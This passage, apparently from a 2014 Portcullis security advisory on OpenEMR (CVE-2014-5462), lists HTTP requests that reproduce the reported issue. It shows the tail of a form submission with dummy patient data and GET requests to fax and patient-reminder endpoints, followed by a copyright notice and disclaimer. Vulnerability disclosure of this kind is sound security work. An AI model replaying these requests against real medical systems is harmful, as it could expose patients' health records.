1A+1AA&form_hipaa_message=30&i1subscriber_employer_city=Winterville&i1subscriber_postal_code=SW1A+1AA&i3copay=5&i1copay=5&i3subscriber_street=5&i3policy_type=12&i1subscriber_street=5&form_vfc=eligible&form_i2subscriber_employer_state=AL&i2subscriber_street=5&form_guardiansname=boom&i1policy_number=5&i3subscriber_lname=boom&form_phone_contact=5&i2subscriber_employer_postal_code=SW1A+1AA&form_homeless=5&form_i1subscriber_sex=Female&form_i3subscriber_state=AL&form_referral_source=Patient&i2subscriber_fname=boom&i1subscriber_ss=5&form_providerID=1&form_state=AL&form_postal_code=SW1A+1AA&form_hipaa_allowsms=NO&i1subscriber_DOB=0000-00-00&i2subscriber_employer_city=Winterville&form_hipaa_allowemail=NO&form_DOB=1994-02-07&form_deceased_date=0000-00-00+00%3a00%3a00&i2effective_date=0000-00-00&i2subscriber_DOB=0000-00-00&i2subscriber_postal_code=SW1A+1AA&form_genericname2=asdasd&form_genericname1=asasd&i1group_number=5&i2subscriber_mname=boom&i2accept_assignment=FALSE&i1subscriber_em + ployer=5&i3subscriber_ss=5&form_phone_cell=5&i2subscriber_lname=boom&form_ethnicity=hisp_or_latin&i1subscriber_phone=5&form_occupation=5&i3subscriber_employer=5&form_hipaa_voice=NO&form_allow_health_info_ex=NO&form_ref_providerID=1&i1policy_type=12&i1subscriber_employer_postal_code=SW1A+1AA&i2plan_name=boom&i2policy_type=12&form_hipaa_notice=NO&form_migrantseasonal=5&form_i3subscriber_relationship=self&form_i3subscriber_sex=Female&form_family_size=5&i2subscriber_city=Winterville&form_phone_biz=5&form_sex=Female + + +Request 17 + +GET /openemr/interface/fax/fax_dispatch_newpid.php?p=1 HTTP/1.1 +Host: 192.168.56.102 +[...] +Cookie: OpenEMR=3m910jdpv3bfed8kie9jihecn6 +Connection: keep-alive + + +Request 18 + +GET /openemr/interface/patient_file/reminder/patient_reminders.php?mode=simple&patient_id=1 HTTP/1.1 +Host: 192.168.56.102 +[...] +Cookie: OpenEMR=ra3sfkvd85bjve6qjm9ouq3225 + + +Further details at: + +https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5462/ + +Copyright: +Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. + +Disclaimer: +The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. \ No newline at end of file